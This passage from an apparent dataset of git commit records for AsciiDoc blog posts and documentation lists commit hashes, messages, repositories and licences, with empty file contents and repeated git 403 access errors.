2016-03-29-Python.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Python.adoc","new_file":"_posts\/2016-03-29-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"749d71a43a6c3635a1f3bab9df07ae8085467b49","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 
2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4590f4823b67c6c2cf992c828304239f99b19fa","subject":"Update 2017-01-28-Inicio.adoc","message":"Update 2017-01-28-Inicio.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-01-28-Inicio.adoc","new_file":"_posts\/2017-01-28-Inicio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf405c155a30a8522dbe1332ef3d89ceae5b9002","subject":"Update 2017-08-23-Kotlin.adoc","message":"Update 2017-08-23-Kotlin.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-23-Kotlin.adoc","new_file":"_posts\/2017-08-23-Kotlin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb9659e36fd68dd0671d0fbc94897ed238b5d409","subject":"Deleted _posts\/2015-03-01-Notes-from-Mathiass-Unicode-talk.adoc","message":"Deleted _posts\/2015-03-01-Notes-from-Mathiass-Unicode-talk.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-03-01-Notes-from-Mathiass-Unicode-talk.adoc","new_file":"_posts\/2015-03-01-Notes-from-Mathiass-Unicode-talk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1dc634279aecd6eb728e38c581c7da227f599d49","subject":"Update 2016-12-16-Programing-Architecture-And-Math.adoc","message":"Update 2016-12-16-Programing-Architecture-And-Math.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-16-Programing-Architecture-And-Math.adoc","new_file":"_posts\/2016-12-16-Programing-Architecture-And-Math.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5ba43b7b833cea2ed473e33f5c053df67e12586","subject":"Update 2017-06-17-Validacao-versus-Verificacao.adoc","message":"Update 
2017-06-17-Validacao-versus-Verificacao.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-06-17-Validacao-versus-Verificacao.adoc","new_file":"_posts\/2017-06-17-Validacao-versus-Verificacao.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ef37744db9d79c15c1d0fedbd32056c5732fcc1","subject":"Update 2017-06-30-First-work-of-my-data-sience.adoc","message":"Update 2017-06-30-First-work-of-my-data-sience.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-30-First-work-of-my-data-sience.adoc","new_file":"_posts\/2017-06-30-First-work-of-my-data-sience.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da37585a26a94bed69f6daef3154327c0168629e","subject":"Update YubiKey_and_OpenVPN_via_PAM.adoc","message":"Update YubiKey_and_OpenVPN_via_PAM.adoc","repos":"eworm-de\/yubico-pam,eworm-de\/yubico-pam,Yubico\/yubico-pam,Yubico\/yubico-pam,eworm-de\/yubico-pam,Yubico\/yubico-pam,madrat-\/yubico-pam,madrat-\/yubico-pam,madrat-\/yubico-pam","old_file":"doc\/YubiKey_and_OpenVPN_via_PAM.adoc","new_file":"doc\/YubiKey_and_OpenVPN_via_PAM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/madrat-\/yubico-pam.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"ca6897b126e42f7184487c8ab7f4b798c304fba5","subject":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","message":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95813cd76997a79dfc364d23719e2d304c865d79","subject":"Delete the file at '_posts\/2017-03-23-ASISCTF-QUAL-2017-Crows-knows.adoc'","message":"Delete the file at '_posts\/2017-03-23-ASISCTF-QUAL-2017-Crows-knows.adoc'","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-03-23-ASISCTF-QUAL-2017-Crows-knows.adoc","new_file":"_posts\/2017-03-23-ASISCTF-QUAL-2017-Crows-knows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a22bc8e5b7de661e21592bb1c779a512ebbd47bd","subject":"Update 2017-08-21-.adoc","message":"Update 
2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d63f31d86547ea240f828c3ac0d093ba044989b","subject":"Email notification plugin doc - WIP","message":"Email notification plugin doc - WIP","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/email-notification-plugin.adoc","new_file":"userguide\/tutorials\/email-notification-plugin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"79e06eecfc470301afd280cfbf87a430cffff8ba","subject":"added lily's tumblr","message":"added lily's tumblr\n","repos":"hypatia-software-org\/hypatia-engine,lillian-lemmer\/hypatia,brechin\/hypatia,lillian-lemmer\/hypatia,brechin\/hypatia,Applemann\/hypatia,Applemann\/hypatia,hypatia-software-org\/hypatia-engine","old_file":"readme.asciidoc","new_file":"readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hypatia-software-org\/hypatia-engine.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d788740b0f105de5c0c479022aacbcb538866140","subject":"Update 2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","message":"Update 2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","new_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b5597340d3b1139547bae58cbddab00ebbcde30","subject":"add docs on inserting data points","message":"add docs on inserting data points\n","repos":"jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsanda\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4054b2538a659cb3dfae87dd1269112b5505855a","subject":"zsh: Add a `prerequisites` section to the readme","message":"zsh: Add a `prerequisites` section to the readme\n\nThis section lists all the software, and the software's version, that is\nnecessary to use the zsh configuration.\n","repos":"PigeonF\/.dotfiles","old_file":"zsh\/README.adoc","new_file":"zsh\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PigeonF\/.dotfiles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"3185b8ec2a1f9484d98b0216c17cbade3612d20e","subject":"typecase vs. ctypecase vs. etypecase","message":"typecase vs. ctypecase vs. etypecase\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"401de69260f9591867e42108a465dedde79677b4","subject":"CL note - Using temporary file","message":"CL note - Using temporary file\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"26061e57907b641197bbcade0f94398ba3e72925","subject":"y2b create post Last Minute Holiday Tech Deals! (4K)","message":"y2b create post Last Minute Holiday Tech Deals! (4K)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-12-16-Last-Minute-Holiday-Tech-Deals-4K.adoc","new_file":"_posts\/2013-12-16-Last-Minute-Holiday-Tech-Deals-4K.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"472259a82cd8283da097901ddeee63e342d97d41","subject":"Update 2016-07-16-Ive-done-some-projects-in-my-time.adoc","message":"Update 2016-07-16-Ive-done-some-projects-in-my-time.adoc","repos":"willyb321\/willyb321.github.io,willyb321\/willyb321.github.io,willyb321\/willyb321.github.io,willyb321\/willyb321.github.io","old_file":"_posts\/2016-07-16-Ive-done-some-projects-in-my-time.adoc","new_file":"_posts\/2016-07-16-Ive-done-some-projects-in-my-time.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willyb321\/willyb321.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73d59e8d8165bfeffb749354711b5e9edc904cc1","subject":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","message":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4ce7395a3e37c7adb2ee0ee5ffdf7d2f52d4869","subject":"Update 2016-01-17-accesslog-mysqllog-syslog-audit.adoc","message":"Update 2016-01-17-accesslog-mysqllog-syslog-audit.adoc","repos":"Cnlouds\/cnlouds.github.io,Cnlouds\/cnlouds.github.io,Cnlouds\/cnlouds.github.io","old_file":"_posts\/2016-01-17-accesslog-mysqllog-syslog-audit.adoc","new_file":"_posts\/2016-01-17-accesslog-mysqllog-syslog-audit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/Cnlouds\/cnlouds.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4af9d1c1004b3490c0075ba352db02450685af9c","subject":"Update 2016-12-09-Azure-Machine-Learning.adoc","message":"Update 2016-12-09-Azure-Machine-Learning.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-09-Azure-Machine-Learning.adoc","new_file":"_posts\/2016-12-09-Azure-Machine-Learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59172f8ca0c275f020487bdb7cfc551af7fc0350","subject":"Update 2019-01-31-Your-Blog-Is-Your-Home.adoc","message":"Update 2019-01-31-Your-Blog-Is-Your-Home.adoc","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2019-01-31-Your-Blog-Is-Your-Home.adoc","new_file":"_posts\/2019-01-31-Your-Blog-Is-Your-Home.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac2dff5598eac97fd692f3fdcffec1ce67275a0f","subject":"add event","message":"add event\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2022\/london-clj-jul.adoc","new_file":"content\/events\/2022\/london-clj-jul.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5239b22f0873b075cc2ba141d6e83bd7439897d9","subject":"Update 2016-03-23-Uber-launches-10000-bug-bounty-program.adoc","message":"Update 2016-03-23-Uber-launches-10000-bug-bounty-program.adoc","repos":"fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly","old_file":"_posts\/2016-03-23-Uber-launches-10000-bug-bounty-program.adoc","new_file":"_posts\/2016-03-23-Uber-launches-10000-bug-bounty-program.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fwalloe\/infosecbriefly.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5b88d38b0ece0cc6b854d003f7dd6e31def8d67","subject":"y2b create post 3 Unique Gadgets You Can Buy Right Now","message":"y2b create post 3 Unique Gadgets You Can Buy Right Now","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-08-3-Unique-Gadgets-You-Can-Buy-Right-Now.adoc","new_file":"_posts\/2018-02-08-3-Unique-Gadgets-You-Can-Buy-Right-Now.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6fa50cf0682e2a2f057541efbd8ba7fb3ac23df","subject":"Added howto manual in slovak","message":"Added howto manual in 
slovak\n","repos":"oskopek\/gymy-seminar","old_file":"HOWTO.adoc","new_file":"HOWTO.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/gymy-seminar.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fe0467a3a15a51becf282bbb707873dcafd1730c","subject":"docs: update encode function","message":"docs: update encode function\n","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"359b8e267f163ece285ed492d6193f5a6c685c4c","subject":"Delete the file at '_posts\/2017-05-06-Migrate-Images-to-Sonata-Media.adoc'","message":"Delete the file at '_posts\/2017-05-06-Migrate-Images-to-Sonata-Media.adoc'","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-06-Migrate-Images-to-Sonata-Media.adoc","new_file":"_posts\/2017-05-06-Migrate-Images-to-Sonata-Media.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75ecf9e14aa1d8eeb9663c770649985a7f5d8b50","subject":"Update 2015-08-24-elementgetElementsByTagNameNS.adoc","message":"Update 2015-08-24-elementgetElementsByTagNameNS.adoc","repos":"tom-konda\/blog,tom-konda\/blog,tom-konda\/blog,tom-konda\/blog","old_file":"_posts\/2015-08-24-elementgetElementsByTagNameNS.adoc","new_file":"_posts\/2015-08-24-elementgetElementsByTagNameNS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tom-konda\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bedfc7a105110d0131ac68c7bc3bce5b4a666910","subject":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","message":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2454be530160d0cc1a91095a60bca1cf90eefe3","subject":"Update 2016-04-04-Javascript.adoc","message":"Update 2016-04-04-Javascript.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Javascript.adoc","new_file":"_posts\/2016-04-04-Javascript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee903bc44b915ce3ec2e680698958c1232ad05d7","subject":"Delete the file at 
'_posts\/2017-03-14-First-Post.adoc'","message":"Delete the file at '_posts\/2017-03-14-First-Post.adoc'","repos":"kzmenet\/kzmenet.github.io,kzmenet\/kzmenet.github.io,kzmenet\/kzmenet.github.io,kzmenet\/kzmenet.github.io","old_file":"_posts\/2017-03-14-First-Post.adoc","new_file":"_posts\/2017-03-14-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kzmenet\/kzmenet.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"672f3b57c099c1ed51e02ae0789239e0c408aaa4","subject":"modularized many-errors.adoc, factored-out imagemap-explanation","message":"modularized many-errors.adoc, factored-out imagemap-explanation\n","repos":"aim42\/htmlSanityCheckConsumer","old_file":"src\/asciidoc\/includes\/imagemaps.adoc","new_file":"src\/asciidoc\/includes\/imagemaps.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aim42\/htmlSanityCheckConsumer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cb0f7edec7b4b6bf4e6f41671b011985f687b942","subject":"y2b create post A Wallet With Built-in Tech!","message":"y2b create post A Wallet With Built-in Tech!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-15-A-Wallet-With-Builtin-Tech.adoc","new_file":"_posts\/2016-06-15-A-Wallet-With-Builtin-Tech.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58f2b6ca4728e2e7fb6402a6762c39a96f5276da","subject":"Add Kerberos\/SPNEGO Shield custom realm","message":"Add Kerberos\/SPNEGO Shield custom realm\n\nCloses 
#14282\n","repos":"F0lha\/elasticsearch,liweinan0423\/elasticsearch,jchampion\/elasticsearch,socialrank\/elasticsearch,jchampion\/elasticsearch,dongjoon-hyun\/elasticsearch,fernandozhu\/elasticsearch,camilojd\/elasticsearch,yynil\/elasticsearch,JervyShi\/elasticsearch,brandonkearby\/elasticsearch,bawse\/elasticsearch,episerver\/elasticsearch,fernandozhu\/elasticsearch,liweinan0423\/elasticsearch,spiegela\/elasticsearch,JSCooke\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scorpionvicky\/elasticsearch,C-Bish\/elasticsearch,nilabhsagar\/elasticsearch,martinstuga\/elasticsearch,obourgain\/elasticsearch,JSCooke\/elasticsearch,kaneshin\/elasticsearch,glefloch\/elasticsearch,rmuir\/elasticsearch,strapdata\/elassandra,jchampion\/elasticsearch,F0lha\/elasticsearch,markharwood\/elasticsearch,glefloch\/elasticsearch,drewr\/elasticsearch,jbertouch\/elasticsearch,polyfractal\/elasticsearch,drewr\/elasticsearch,MaineC\/elasticsearch,mikemccand\/elasticsearch,avikurapati\/elasticsearch,awislowski\/elasticsearch,robin13\/elasticsearch,ZTE-PaaS\/elasticsearch,JSCooke\/elasticsearch,brandonkearby\/elasticsearch,dpursehouse\/elasticsearch,wbowling\/elasticsearch,rlugojr\/elasticsearch,IanvsPoplicola\/elasticsearch,socialrank\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,njlawton\/elasticsearch,zkidkid\/elasticsearch,fforbeck\/elasticsearch,schonfeld\/elasticsearch,dongjoon-hyun\/elasticsearch,spiegela\/elasticsearch,sreeramjayan\/elasticsearch,StefanGor\/elasticsearch,uschindler\/elasticsearch,wangtuo\/elasticsearch,socialrank\/elasticsearch,artnowo\/elasticsearch,strapdata\/elassandra5-rc,alexshadow007\/elasticsearch,palecur\/elasticsearch,girirajsharma\/elasticsearch,camilojd\/elasticsearch,camilojd\/elasticsearch,cwurm\/elasticsearch,nknize\/elasticsearch,spiegela\/elasticsearch,masaruh\/elasticsearch,AndreKR\/elasticsearch,geidies\/elasticsearch,jprante\/elasticsearch,episerver\/elasticsearch,snikch\/elasticsearch,bawse\/elasticsearch,coding0011\/elasticsearch,jbertouch\/elasticsearch,polyfractal\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,PhaedrusTheGreek\/elasticsearch,i-am-Nathan\/elasticsearch,MaineC\/elasticsearch,tebriel\/elasticsearch,palecur\/elasticsearch,gmarz\/elasticsearch,vroyer\/elasticassandra,qwerty4030\/elasticsearch,s1monw\/elasticsearch,spiegela\/elasticsearch,lks21c\/elasticsearch,strapdata\/elassandra5-rc,jpountz\/elasticsearch,GlenRSmith\/elasticsearch,mortonsykes\/elasticsearch,wuranbo\/elasticsearch,brandonkearby\/elasticsearch,mohit\/elasticsearch,kaneshin\/elasticsearch,kalimatas\/elasticsearch,nezirus\/elasticsearch,zkidkid\/elasticsearch,trangvh\/elasticsearch,umeshdangat\/elasticsearch,nezirus\/elasticsearch,mapr\/elasticsearch,clintongormley\/elasticsearch,davidvgalbraith\/elasticsearch,awislowski\/elasticsearch,jpountz\/elasticsearch,rlugojr\/elasticsearch,gmarz\/elasticsearch,clintongormley\/elasticsearch,tebriel\/elasticsearch,coding0011\/elasticsearch,MisterAndersen\/elasticsearch,rajanm\/elasticsearch,Stacey-Gammon\/elasticsearch,fernandozhu\/elasticsearch,IanvsPoplicola\/elasticsearch,wbowling\/elasticsearch,masaruh\/elasticsearch,ricardocerq\/elasticsearch,umeshdangat\/elasticsearch,andrejserafim\/elasticsearch,ESamir\/elasticsearch,dongjoon-hyun\/elasticsearch,cwurm\/elasticsearch,sreeramjayan\/elasticsearch,C-Bish\/elasticsearch,rhoml\/elasticsearch,robin13\/elasticsearch,snikch\/elasticsearch,i-am-Nathan\/elasticsearch,xuzha\/elasticsearch,jimczi\/elasticsearch,geidies\/elasticsearch,a2lin\/elasticsearch,PhaedrusTheGreek\/elasticsearch,elasticdog\/elasticse
arch,diendt\/elasticsearch,sneivandt\/elasticsearch,qwerty4030\/elasticsearch,nilabhsagar\/elasticsearch,nknize\/elasticsearch,kalimatas\/elasticsearch,drewr\/elasticsearch,episerver\/elasticsearch,umeshdangat\/elasticsearch,andrejserafim\/elasticsearch,IanvsPoplicola\/elasticsearch,i-am-Nathan\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,nezirus\/elasticsearch,JSCooke\/elasticsearch,diendt\/elasticsearch,nknize\/elasticsearch,camilojd\/elasticsearch,mortonsykes\/elasticsearch,StefanGor\/elasticsearch,schonfeld\/elasticsearch,vroyer\/elasticassandra,uschindler\/elasticsearch,episerver\/elasticsearch,a2lin\/elasticsearch,strapdata\/elassandra,IanvsPoplicola\/elasticsearch,a2lin\/elasticsearch,strapdata\/elassandra,rmuir\/elasticsearch,scottsom\/elasticsearch,geidies\/elasticsearch,yynil\/elasticsearch,polyfractal\/elasticsearch,gingerwizard\/elasticsearch,naveenhooda2000\/elasticsearch,JervyShi\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,martinstuga\/elasticsearch,rlugojr\/elasticsearch,StefanGor\/elasticsearch,myelin\/elasticsearch,polyfractal\/elasticsearch,snikch\/elasticsearch,LewayneNaidoo\/elasticsearch,fforbeck\/elasticsearch,alexshadow007\/elasticsearch,mjason3\/elasticsearch,nomoa\/elasticsearch,snikch\/elasticsearch,dpursehouse\/elasticsearch,obourgain\/elasticsearch,obourgain\/elasticsearch,masaruh\/elasticsearch,avikurapati\/elasticsearch,markharwood\/elasticsearch,myelin\/elasticsearch,cwurm\/elasticsearch,pozhidaevak\/elasticsearch,PhaedrusTheGreek\/elasticsearch,rhoml\/elasticsearch,JackyMai\/elasticsearch,sreeramjayan\/elasticsearch,tebriel\/elasticsearch,myelin\/elasticsearch,jchampion\/elasticsearch,umeshdangat\/elasticsearch,jimczi\/elasticsearch,jbertouch\/elasticsearch,MaineC\/elasticsearch,rmuir\/elasticsearch,fred84\/elasticsearch,rajanm\/elasticsearch,s1monw\/elasticsearch,tebriel\/elasticsearch,avikurapati\/elasticsearch,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,mjason3\/elasticsearch,nomoa\/elasticsearch,scorpionvicky\/elasticsearch,umeshdangat\/elasticsearch,C-Bish\/elasticsearch,rmuir\/elasticsearch,fred84\/elasticsearch,markwalkom\/elasticsearch,alexshadow007\/elasticsearch,mikemccand\/elasticsearch,J